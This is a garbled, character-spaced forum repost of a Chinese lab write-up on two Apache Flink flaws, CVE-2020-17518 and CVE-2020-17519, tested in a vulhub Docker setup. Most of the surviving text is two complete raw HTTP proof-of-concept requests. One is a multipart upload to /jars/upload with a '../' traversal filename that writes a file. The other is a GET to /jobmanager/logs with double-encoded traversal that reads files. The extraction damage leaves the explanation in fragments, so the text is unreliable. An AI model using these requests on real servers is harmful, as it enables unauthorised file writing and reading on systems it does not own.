[27169] 2021-02-23_追洞小组实战CVE-2020-17518漏洞

文档创建者:s7ckTeam
浏览次数:12
最后更新:2025-01-19
2021-02-23_追洞小组实战CVE-2020-17518漏洞   |   C V E - 2 0 2 0 - 1 7 5 1 8     M s 0 8 0 6 7   2 0 2 1 - 0 2 - 2 3 #   , 2 3 #   , 7 M S 0 8 0 6 7   W E B L M s 0 8 0 6 7     A p a c h e   F l i n k   C V E - 2 0 2 0 - 1 7 5 1 8 R E S T   A P I 1 . 5 . 1     1 . 1 1 . 2 F l i n k   1 . 5 . 1 R E S T   A P I H T T P   h e a d e r 使 v u l h u b 1 . 1 1 . 2 c d   v u l h u b - m a s t e r / f l i n k / C V E - 2 0 2 0 - 1 7 5 1 8 / d o c k e r - c o m p o s e   b u i l d d o c k e r - c o m p o s e   u p   - d
P O C 4 0 0 P O S T   / j a r s / u p l o a d   H T T P / 1 . 1 H o s t :   1 7 2 . 1 6 . 1 2 . 1 4 4 : 8 0 8 1 A c c e p t - E n c o d i n g :   g z i p ,   d e f l a t e A c c e p t :   * / * A c c e p t - L a n g u a g e :   e n U s e r - A g e n t :   M o z i l l a / 5 . 0   ( W i n d o w s   N T   1 0 . 0 ;   W i n 6 4 ;   x 6 4 )   A p p l e W e b K i t / 5 3 7 . 3 6   ( K H T M L ,   l i k e   G e c k o )   C h r o m e / 8 7 . 0 . 4 2 8 0 . 8 8   S a f a r i / 5 3 7 . 3 6 C o n n e c t i o n :   c l o s e C o n t e n t - T y p e :   m u l t i p a r t / f o r m - d a t a ;   b o u n d a r y = - - - - W e b K i t F o r m B o u n d a r y o Z 8 m e K n r r s o 8 9 R 6 Y C o n t e n t - L e n g t h :   1 7 9 - - - - - - W e b K i t F o r m B o u n d a r y o Z 8 m e K n r r s o 8 9 R 6 Y C o n t e n t - D i s p o s i t i o n :   f o r m - d a t a ;   n a m e = " j a r f i l e " ;   f i l e n a m e = " . . / . . / . . / . . / . . / . . / t m p / t e s t " t e s t - - - - - - W e b K i t F o r m B o u n d a r y o Z 8 m e K n r r s o 8 9 R 6 Y - -
C V E - 2 0 2 0 - 1 7 5 1 9 A p a c h e   F l i n k   V e r s i o n : 1 . 1 1 . 0 , 1 . 1 1 . 1 , 1 . 1 1 . 2 G E T   / j o b m a n a g e r / l o g s / . . % 2 5 2 f . . % 2 5 2 f . . % 2 5 2 f . . % 2 5 2 f . . % 2 5 2 f . . % 2 5 2 f . . % 2 5 2 f . . % 2 5 2 f . . % 2 5 2 f . . % 2 5 2 f . . % 2 5 2 f . . % 2 5 2 f t m p % 2 5 2 f t e s t   H T T P / 1 . 1 H o s t :   1 7 2 . 1 6 . 1 2 . 1 4 4 : 8 0 8 1 C a c h e - C o n t r o l :   m a x - a g e = 0 U p g r a d e - I n s e c u r e - R e q u e s t s :   1 U s e r - A g e n t :   M o z i l l a / 5 . 0   ( W i n d o w s   N T   1 0 . 0 ;   W i n 6 4 ;   x 6 4 )   A p p l e W e b K i t / 5 3 7 . 3 6   ( K H T M L ,   l i k e   G e c k o )   C h r o m e / 7 9 . 0 . 3 9 4 5 . 1 3 0   S a f a r i / 5 3 7 . 3 6 A c c e p t :   t e x t / h t m l , a p p l i c a t i o n / x h t m l + x m l , a p p l i c a t i o n / x m l ; q = 0 . 9 , i m a g e / w e b p , i m a g e / a p n g , * / * ; q = 0 . 8 , a p p l i c a t i o n / s i g n e d - e x c h a n g e ; v = b 3 ; q = 0 . 9 A c c e p t - E n c o d i n g :   g z i p ,   d e f l a t e A c c e p t - L a n g u a g e :   z h - C N , z h ; q = 0 . 9 C o n n e c t i o n :   c l o s e
    3 6 0 0 0 +
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则